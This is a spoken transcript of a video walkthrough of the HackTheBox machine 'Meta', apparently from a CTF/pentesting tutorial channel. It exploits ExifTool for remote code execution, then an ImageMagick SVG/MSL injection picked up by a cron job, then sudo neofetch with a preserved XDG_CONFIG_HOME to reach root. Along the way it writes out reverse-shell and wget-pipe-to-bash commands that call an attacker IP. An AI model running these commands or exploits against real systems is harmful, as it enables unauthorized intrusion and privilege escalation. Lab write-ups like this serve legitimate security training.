What's going on YouTube? This is Ipsec. We're doing Meta from HackTheBox, and I really like this box because the story it builds by exploiting ExifTool in two different ways, and the second way to exploit it gets you more privileges, but it's initially blocked off by the web application because there's an image upload and it only accepts JPEGs and PNGs, and in order to exploit it the other way, you need to be able to upload a SVG file. Thankfully, the ExifTool is vulnerable to a remote command execution, so you can get a shell as www data, and then you can drop a malicious SVG file in a directory, which the application will convert to a PNG file, I believe. And initially, you couldn't just upload that SVG file because the web server disallows it. So it's really creative to, once you get on the server, to look at it and exploit it a different way because all the access controls are placed on the server. So with that being said, let's just jump in. As always, we start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it meta, and then the IP address, which is 10.10.11.140. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's a Debian box. Then we have HTTP on port 80, it's running Apache, and it's redirecting us to this domain artcorp.htb. So we could go over in Firefox and just verify this, and we see we have a 404 page because we don't know what this DNS name is. So let us edit our host file, so sudo v etc host, and we can say 10.10.11.140, put in artcorp.htb, and then save this. And when we refresh this page, we have something. So I'm just looking at this. There's a new product, Metaview. We got some names, Judy E, Sarah W, Thomas S. So maybe I would be guessing like the username as Thomas S at something if there's a login form. There is a PHP developer, so chances are this website, or at least the Metaview product, is going to be PHP. And looking at all these links, I'm looking at the bottom left, they go nowhere. So we can try checking this page if it's a PHP. So index.php doesn't return anything. If we do HTML, we get this page. So let us just run a Go Buster. And since this does point out a virtual host right away, meaning I couldn't access it via the IP, that's the first enumeration I'm going to begin with. So Go Buster VHOST -u, we'll call it artcorp.htb, word list opt sec list, discovery, DNS, subdomain. I'm going to do 5,000 of the top 1 million. And the other reason why I'm starting off with, oh shoot. Did I have it wrong? Hold on. Let's see, artcorp.htb. Let's just copy and paste this. Did I screw something up? I think I did. I think I have a P there. Okay, yeah, typo. But all the reason I'm starting with a virtual host enumeration scan because it goes much quicker. There's not a lot of subdomains versus pages. If this was like index.php, I may do enumeration there, but this looks like static files. Like there's a few directories you could check, like does uploads exist? No, it doesn't. Robots.txt would have been found by nmap. So really not sure what we'd find if we just bust that. We do have a dev01.artcorp.htb. So let's add this to our host file. And we need to put a space. There we go. And when we go here, we have the ArtCorp development environment, and it links us to Metaview. And looking at this, we have a file upload form. So I'm going to click Browse, and let's create a file here. So I'm going to touch index.html, and let's upload this. Click Upload, and we get the file is empty. So we can put something in here like, please subscribe, and see what happens. So now when we browse, we hit Upload, and it says file is not allowed, only JPEG and PNG. So let's move index.html to be index.jpg, and just see if this uploads. We're just playing with these error messages, seeing what happens. Still not allowed. We can intercept this request in Burp Suite, see if there's anything else we could be changing. So let's make sure my intercept is on, click upload, and we have index.jpg and content type image/jpeg. So I think everything is good here. It's probably checking something like the MIME type. So let's just forward this request along, and I'm going to do a locate-r. I'm going to end with JPEG, and just grab a file out of here. This xssr.jpg, sure, let's try this. Okay, so now we have a valid JPEG. Let's see exactly what this does. If I click upload, it looks like the output from ExifTool. The other thing we probably should be checking is for like uploads. If I check /uploads, I get nothing. We can check Metaview. Is on uploads here. Not found. Upload. Not found. So I always want to have some recon going in the background. We have this dirbuster finished. So I'm just going to run pharaohbuster and let this run while we check everything else out. Actually, I can probably do -x PHP because we know Metaview is a PHP application. If I just go index.php, we find it. So there we go. That looks like it's going along. So while this goes, we did have this running ExifTool, right? So I do this, at least I assume it's ExifTool. If I run it locally, we can see it's a lot of the same information. Oddly enough, we don't have the version number here. It's not giving us everything, right? Did it give us megapixels at the bottom? No, so it's a truncated version of ExifTool. See, we do have a comment here. So what I'm going to do is say ExifTool-comment is equal to, and let's put some PHP code. So if I do this, PHP, echo, please subscribe, and then end it like this, we see the file has been updated. So now if we look at the comment, which was just xssr, if I run this again, we have PHP syntax. So now let's go and upload this and see exactly what happens. So we upload, and comment is blanked out. So if I control U, we look at it, it's just blanked out because it's HTML. It's filtering out what's between these brackets. So this does tell me it's cross-site scriptable. So I bet if we did a comment, we can do any HTML we want. So we could try bold, please subscribe, then /bold, and upload this. And what this would do would be allow us to attack the browser of people that are looking at this. We can see please subscribe is in bold. From hindsight, I know there's not another user viewing this page, so there's nothing we can do here. But whenever you're testing an application, these are the types of things you want to look into. I just noticed, hey, this isn't entity encoded, so you should see like a and GT semicolon for greater than sign in and LT less semicolon for less than. Since it wasn't encoding these brackets, I knew we could do cross-site scripting there. So let's try the next thing. Let's look if there's any vulnerabilities inside of ExifTool. So I'm just going to turn Burp Suite off, and then I can do ExifTool RCE. Let's just look for this. 2021, this looks like it could be potentially good. And going through this, let's see, the exploit. I just want like a GitHub page. Conclusion. Let's see. Here we go. So here's a GitHub. Let's just git clone this. cd cve. And let's see. What is this exploit.py doing? It's putting a reverse shell in for us. I don't know if I like this exploit because it's not exactly... I know there's a better one. I'm going to look at it again. Let's go This one maybe? Okay. This is a bit more transparent at what's happening. Get clone. Like, the other one would have worked. Just run a Python script and bam. But sometimes I just like slowing down or looking at a different one. So if we look at this, let's see. What's the MIME type of that? We do this eval config and then pass a system command. So let's look at what eval.config is. And let's see, encoded base val. So I'm guessing in this meta, there is a command execution thing because we have an eval here. And I think this is where we're actually executing our code. So if we just copy eval.config up one directory, that's the only file we need. So we can do ExifTool and then -config eval.config, then the image name, and then the variable. So -eval system, we can just do this. So if we run this, go to Metaview, upload XSSR, we can see the ls has been outputted. So now the next step, let's just get a reverse shell. Since we're in two different types of quotes right here, I want to avoid any like special characters. So that's why I'm not going to do like --c, --i, because those type of payloads require these quotes. And I just hate getting into the realm of escaping quotes because it's annoying and hard to read. So I'm going to do curl 10.10.14.8 slash index dot, oh, we'll just call this shell .txt and then pipe it over to bash. So let's go make dir dub. And we could like base64 encode and do it that way. You've seen me do it before, like echo some base64 text there, base64-d, bash. Like that type of Cradle would work perfectly fine here. I just like changing it up every now and then. And this one I'm going to pipe it over from curl. So let's do v shell.text --i dev tcp 10.10.14.8 9001 0 and 1. And you notice a lot of times when I run this, I do a bash-c first. I don't have to do that because I know bash is going to be executing it because of this pipe. So that's there. Let me just double check, eyeball it. That looks good. Python 3-m HTTP server. Let's listen on port 80, run it with sudo, run this, and then we can re-upload this image. And we don't have a hit. And I didn't listen on port 9001, but it didn't hit our web server anyways. So I'm going to try something real quick. Let's do a which on curl to see if it exists on the system, because a lot of times curl may not exist on a system, so that doesn't work. And we can see it doesn't work there. So let's try which wget and see if wget exists. If none of these exist, we're probably going to try like the base64 payload Cradle. But we have user bin wget. So wget exists. So we can probably do the same payload, except we swap out curl with wget, and then -O. This is going to be for like output file or output document. I forget what it is. And then just a dash, which is standard out. So if you didn't do this, by default, wget would download it to the disk. This just says wget output it to standard out. And then we pipe standard out to bash. And this should get us a reverse shell. So let's listen on 9001. Go to XSSR, upload. It's taking a long time, which is a good indication that it worked. And whenever something hangs like this, I always like double checking to make sure I did not hang the web server. We can still load pages because every now and then, especially when doing like internal assessment, something's running a non-threaded web server, you get your reverse shell and then the box is just dead for everyone else, which is never good. And in those cases, I would modify the payload to add like an ampersand or an and sign at the end of bash, so it just goes and forks into the background. But that's besides the point. So let's do Python 3-c import pty.spawn bin bash like this. Awesome. And then stty raw minus echo semicolon fg, hit enter twice. And now we have tab auto completion, things like that. If I want to clear it, I always like doing export xterm, or export term is equal to xterm. And then we should do stty-a rows 26, columns 105. So I'm going to do stty rows 26, cols 105. And now we have a proper TTY. If I didn't do that, if I held a key, then it would do some weird line wrapping. You always want to fix this. And I always like giving myself a terminal. So now that we're on this application, let's see what happens. There is an uploads directory. So Metaview, let's see. If I go here, we're not on intercept. Uploads, not found. Weird. Touch T. So upload/T does exist. Okay, so I guess directory indexing is not turned on because uploads, we see, not found. But if I put a file that does exist on the server, it is there. So in the future, when like looking for uploads directories of file uploads, something you may want to check is just like go one layer deep into this directory. It doesn't really help us right now because the upload isn't here. Let's do for I in, let's just see if we hit this quickly. So let's just send this. So I'm going to hit upload, then alt tab and enter. And we see the file does exist here. It's PHP random name. So we wouldn't have been able to brute force this anyways because of these random characters. I guess we could go buster or something, but it eventually gets deleted. And I bet if you look in the code, this is called a temporary file name that it uses to work with. But let's see what else there is. We have this composer.json, and that's just going to tell us it runs ExifTool. I guess we could have found this in a Go Buster and figured out it was running ExifTool this way, because if we go to, let's see, Metaview composer.json, this is always a good file, list the dependencies of a PHP app. So that was a way we could have found the vulnerability, or at least identified something. I don't see anything too interesting here. There's no database, so there's no password to grab. If we go to var devo1artcorp.htb, we have this convert images directory, and that is not being used anywhere. So this is interesting. I'm going to go up one. I'm going to grep-r, convert images, see if it exists anywhere here. It doesn't. I was thinking like this could have been a way to bypass the MIME type check of the application because the web app only allows us to upload JPEGs, right? And then it passes it over to ExifTool somehow. We could view the web code to see exactly how, but it passes it to ExifTool. So I was thinking, maybe it puts the image in convert images and then uses that ExifTool wrapper to just do anything on that convert images directory. So if we can write to this convert images directory, we could potentially bypass any type of check. So I'm going to do a touch test, and we can indeed write to this directory. I guess we don't have to remove the file. It'd be handy to see if anything happens to this file eventually. The other thing we could do is see if anything on this box actually uses it. So I'm going to grep-r convert images on /, and I'm going to pipe errors to null, right? And right away, we see there is a file, user local bin convert images.sh, and it's running mogrify, also out of user local bin. And this is interesting because user, And in Linux, when the path has local, that means it's not going to be managed by the package manager. It's a local thing the user did. So when you see files there, always check like their versions because it could be out of date. So I'm going to look at mogrify, just run this. I'm going to add -v because that's normally the version flag, and that is not the version flag. -V, just do no arguments, and let's go to the top. And this has a lot of options. Wow. Let's see. License. Mogrify. So we can see it's running a version from 2021. Oddly enough, the copyright is 2020, but we have an old version of ImageMagick being used from Mogrify. So let's Google for like ImageMagick vulnerabilities. I know there's ImageTragic, but that was like 2016, I want to say. So I'm just going to Google ImageMagick RCE, see what we have. Ignoring this ImageTragic, well, we have a take two. So let's see when this was. Is there a CVE? Well, 2018, so I'm not going to care about that. Let's add 2021 to the search. Google told us we wanted to. So we have this tweet. Let's see. ExifTool. That doesn't look like it's linking to anything helpful. ImageTragic. Let's see. Will we do 2020? Is there anything here? Command injection. Let's see what this is. Versec. Is this going to be the same thing? ImageMagick shell injection via PDF. This looks like it is different. And it's talking a lot about the exploit. I'm looking for a payload, encrypted PDFs, MSL and polygons. And let's see, poc.svg. So this is going to be probably what we want to test with. I'm just going to put something in this. We see I did another ls. The file is deleted that was here. I'm going to call this pwn.svg, right? Yep. And then paste this in. And since something's deleting files out of here, I'm just going to change this to be temp owned. And then let's cat user local bin, what was it? Convert images, right? Yep. And I'm going to copy everything up to the to_dev null because I don't want to hide error messages, right? So if I execute this, we see it's unable to open poc.svg. So if I look at temp, it's gone. Well, temp, nothing is there. The file still exists. And it was still looking for poc.svg. So I guess we have to link it here. Since we changed the name, let's do pwn.svg here. And then rerun this. We just get a permission denied, which is fine. We don't have a real error message. If I look at temp, we see owned. And of course, it's going to be dub data because that is who our user is. So, oh, that got deleted. So pwn.svg. Let's copy this again. Paste. Is that not copy? Copy. Let's do Control-Shift insert. There we go. So I'm going to call this one, pwn2. Because I want to see what this user is, right? And this is pwned. And we want to change this to temp. So now if something runs on a cron and executes this pwn.svg, it should write to /temp, right? And now let's just copy this to, I'll just call it poc.svg. And before we forget, let's just change the MSL, because this is going to be where reverse shell is. So we can just, looks like, execute any code here, right, between these two backticks. So we already have the cradle. So wget -O 0 10 10 14 8 shell.txt is what I think I called it. So let's go back here, V, and we can see, oddly enough, this didn't even find the Metaview, but let's see, cd www shell.txt sudo python 3-m http server 80. We're listening. I should do nc lvnp 9001 so we can catch a shell. And then we save this. If we look at temp, nothing's written yet, so I don't think anything's happened. Maybe it'll happen on the next minute. Both these files exist. Temp. Yes. So what I'm going to do, look at date. I'm going to sleep for 40 seconds. Actually, date, sleep for 25 seconds because I want to catch this live. And we're going to do some editing magic to skip this time. Okay, 25 seconds has passed. If I do it ls, we see the files are still there. Let's do psef convert. See if we can find anything. We missed it on the ps. I bet if we ran the program like pspy, we would have seen it. But our directory is empty. If we look at temp, we do see, ooh, pwn2 did not get written. So maybe I screwed up that payload. And we don't have anything. That was bizarre. So we completely screwed up. Let's do pwn.svg. We will copy this. Paste. And let's try this again. So I'm going to do wget 10.10.14.8 bash. We have to put it to standard out. And this is pwn.svg. Okay. Then I'm going to kill these so we can do it all on this pane real quick. So cd www sudo python 3-m http server 80 and clvnp 9001. Okay, looking at the date. We have some time, I think, before cron could run. I want to test this out. And I've ran a lot of commands on this box. There we go. We got a hit, but we didn't get a shell. Which is weird. wget-o. Oh, we need to shell.txt. Run this. And yeah, we do get a shell, so that should work. There we go. It must have been a new minute, yeah. And we got this. So I'm not sure what we screwed up the first time, but there we have it working. We should do the python 3-c, import pty spawn, fix the terminal. Actually, let's not do it and see if we run into an error message. So we can do sudo-l, and we can see the user Thomas may run the following command on meta. User bin neofetch, and then 2 quotes. So we can't pass any arguments to neofetch. If we do neofetch, I actually guess maybe this just prints like the banner. I don't know what neofetch is, but it's printing something. I'm guessing it's just the like SSH banner when you log in, because I've seen something like this. Neofetch-h, neofetch-h. Not sure, but let's do a GTFO bin and see if there's any ways we can get this to execute commands. So neofetch sudo. So it looks like we can execute neofetch with a config, but we can't do this because we can't pass any arguments to neofetch. So let's look at that sudo again, and we can see the environment keep xdg config home. So this environment variable is going to persist through sudo. Normally when you do a sudo, your environment gets reset with this end reset, so you can't do any of these types of hijacks. So what I'm guessing is we can set the neofetch config to our home directory and then put this exec line in it and get command execution. So let's try this real quick. So if I just do cd home, do lsla, it's probably in config, and then we have this neofetch directory, and we have config. So this looks good. Let's see, before we do this, because there's probably going to be a cron that reverts this config or something, I want to echo xdg config home, and this is blank. I can also do env to look at all my environment variables. So I'm going to do export xdg config home is equal to home thomas.config, I believe. If this doesn't work, then I'm going to try changing it up one directory, so it's just home thomas. So now if I type env, we do have this. So sudo-l, we want to run that command after this. So I'm going to echo this into, was it config.config or config.conf, I think. Yep. And then if I do the sudo and execute this, ID, oh, we have root. So we didn't even have to run into any issues with not sending our terminal correctly. But if I control C or do things like that, then I lose the terminal, which just sucks. So that's why I always like doing the Python 3-C import pty.spawn, bin bash, and then stty raw minus echo fg. So now if I control seed, I wouldn't lose my shell. But we're now root on the box. We can get root.txt. And hope you enjoyed this video. So take care, and I will see you all next time.